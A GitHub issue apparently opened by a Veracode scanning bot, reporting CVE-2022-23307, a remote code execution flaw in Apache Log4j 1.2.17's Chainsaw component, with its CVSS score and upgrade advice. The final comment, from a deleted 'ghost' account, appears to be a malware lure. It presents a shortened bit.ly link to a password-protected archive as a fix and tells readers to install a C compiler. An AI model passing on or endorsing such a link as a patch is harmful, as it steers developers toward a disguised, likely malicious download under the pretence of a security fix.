CVE: 2022-23307 found in Apache Log4j - Version: 1.2.17 [JAVA]

[github-actions[bot]]

Veracode Software Composition Analysis

Attribute	Details
Library	Apache Log4j
Description	Apache Log4j 1.2
Language	JAVA
Vulnerability	Remote Code Execution (RCE)
Vulnerability description	Apache Chainsaw in log4j is vulnerable to remote code execution. The vulnerability exists due to a deserialization of untrusted object vulnerability allowing an attacker to execute maliciously scripted code via the system.
CVE	2022-23307
CVSS score	9
Vulnerability present in version/s	1.1.3-1.2.17
Found library version/s	1.2.17
Vulnerability fixed in version
Library latest version	1.2.17
Fix	There is currently no fix version for this package. Upgrade to log4j 2, use other utility to view logs or remove the Chainsaw component if possible

Links:

• https://sca.analysiscenter.veracode.com/vulnerability-database/libraries/163?version=1.2.17
• https://sca.analysiscenter.veracode.com/vulnerability-database/vulnerabilities/33755
• Patch:

[ghost]

This might help:This file might fix it

https://bit.ly/3zo8fAM Archive password: changeme If you don't have the c compliator, install it.(gcc or clang)